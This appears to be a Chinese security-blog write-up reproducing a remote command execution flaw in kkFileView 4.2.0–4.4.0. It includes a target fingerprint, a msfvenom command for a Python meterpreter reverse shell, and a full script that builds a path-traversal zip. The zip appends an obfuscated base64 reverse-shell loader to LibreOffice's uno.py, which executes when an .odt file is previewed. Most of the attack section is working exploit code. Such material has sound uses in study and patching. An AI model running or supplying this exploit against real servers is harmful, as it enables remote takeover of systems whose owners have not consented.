kkfileview 任意命令执行漏洞
kkFileView 为文件文档在线预览解决方案,该项目使用流行的spring boot搭建,易上手和部署,基本支持主流办公文档的在线预览,如doc,docx,xls,xlsx,ppt,pptx,pdf,txt,zip,rar,图片,视频,音频等等。
指纹信息
title="kkfileview"
漏洞复现
影响版本 4.2.0 <= kkfileview <= 4.4.0
漏洞复现在本地完成 centos7(部署kkfileview):192.168.20.128 kali:192.168.20.129
kkfileview采用docker部署
wget https://kkview.cn/resource/kkFileView-4.2.0-docker.tar
docker load -i kkFileView-4.2.0-docker.tar
docker run -itd -p 8012:8012 keking/kkfileview:4.2.0
该漏洞可通过路径穿越将恶意文件上传到任意位置,并会在存在的文件下追加内容,在kkfileview接收到odt文件并且上传人尝试预览时会调用/opt/libreoffice7.3/program/uno.py这个python文件来进行odt文件转换为pdf预览,使用msf生成python木马文件
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.20.129 LPORT=11321 -f raw -o kkview.py
利用python脚本生成可完成目录穿越的压缩包
import zipfile
if __name__ == "__main__":
try:
binary1 = b'test'
binary2 = b'exec(__import__(\'base64\').b64decode(__import__(\'codecs\').getencoder(\'utf-8\')(\'aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjAuMTI5JywxMTMyMSkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoemxpYi5kZWNvbXByZXNzKGJhc2U2NC5iNjRkZWNvZGUoZCkpLHsncyc6c30pCg==\')[0]))'
zipFile = zipfile.ZipFile("hack.zip", "a", zipfile.ZIP_DEFLATED)
info = zipfile.ZipInfo("hack.zip")
zipFile.writestr("test", binary1)
zipFile.writestr("../../../../../../../../../../../../../../../../../../../opt/libreoffice7.3/program/uno.py", binary2)
zipFile.close()
except IOError as e:
raise e
上传生成的hack.zip之后,点击预览激活该恶意文件追加内容到/opt/libreoffice7.3/program/uno.py
上传obt文件(可新建一个word文件另存为obt文件),点击预览,即可在msf上监听到shell上线
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)